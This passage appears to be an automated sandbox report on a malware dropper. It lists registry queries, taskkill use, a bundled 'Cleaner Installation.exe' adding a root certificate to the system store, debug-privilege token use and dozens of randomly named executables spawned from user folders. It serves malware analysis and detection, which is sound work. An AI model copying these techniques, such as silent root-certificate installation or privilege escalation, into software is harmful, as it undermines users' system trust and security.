| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4689318.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1610538.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6269809.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4402357.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe | N/A |
| N/A | N/A | C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv luym4IzXO0urCuKpt8jgJQ.0.2
C:\Users\Admin\Documents\JxpkWClkJbM2fYm7OhyaUb6t.exe
"C:\Users\Admin\Documents\JxpkWClkJbM2fYm7OhyaUb6t.exe"
C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe
"C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe"
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
"C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe"
C:\Users\Admin\Documents\yw0ARrSPlqSyuceX0tjgIibn.exe
"C:\Users\Admin\Documents\yw0ARrSPlqSyuceX0tjgIibn.exe"
C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe
"C:\Users\Admin\Documents\0AYyRtztyqrbI93baqYQFzAF.exe"
C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe
"C:\Users\Admin\Documents\_9x9uZ9VZbumvRyESvdNDHkK.exe"
C:\Users\Admin\Documents\zXSa7l7MEIxshkxZELsqXAEU.exe
"C:\Users\Admin\Documents\zXSa7l7MEIxshkxZELsqXAEU.exe"
C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe
"C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe"
C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe
"C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe"
C:\Users\Admin\Documents\dJOhK8qbsoDBcSld8pMhMjWQ.exe
"C:\Users\Admin\Documents\dJOhK8qbsoDBcSld8pMhMjWQ.exe"
C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe
"C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe"
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
"C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe"
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
"C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe"
C:\Users\Admin\Documents\9pfZd5qZRhGCooZrVYX90C1h.exe
"C:\Users\Admin\Documents\9pfZd5qZRhGCooZrVYX90C1h.exe"
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
"C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe"
C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp" /SL5="$7020A,138429,56832,C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe"
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe
"C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 400 -ip 400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1640 -ip 1640
C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe
"C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1456 -ip 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4952 -ip 4952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 316
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
C:\Users\Admin\AppData\Roaming\1610538.exe
"C:\Users\Admin\AppData\Roaming\1610538.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 292
C:\Users\Admin\AppData\Roaming\4402357.exe
"C:\Users\Admin\AppData\Roaming\4402357.exe"
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
"C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3324 -ip 3324
C:\Users\Admin\AppData\Roaming\6714308.exe
"C:\Users\Admin\AppData\Roaming\6714308.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 312
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe
"C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe"
C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe
"C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe"
C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe
"C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
"C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe"
C:\Users\Admin\AppData\Roaming\6269809.exe
"C:\Users\Admin\AppData\Roaming\6269809.exe"
C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe
"C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe"
C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe
"C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe"
C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe
"C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe"
C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe
"C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe"
C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe
"C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe"
C:\Users\Admin\Documents\HgTUPdNwPn1o75ugfakeivdf.exe
"C:\Users\Admin\Documents\HgTUPdNwPn1o75ugfakeivdf.exe"
C:\Users\Admin\Documents\BldqCG2I5GdWcHEKQbCVyOfe.exe
"C:\Users\Admin\Documents\BldqCG2I5GdWcHEKQbCVyOfe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1420 -ip 1420
C:\Users\Admin\Documents\gRrDvTVcNRgnOFqG3tJO9JHJ.exe
"C:\Users\Admin\Documents\gRrDvTVcNRgnOFqG3tJO9JHJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 312
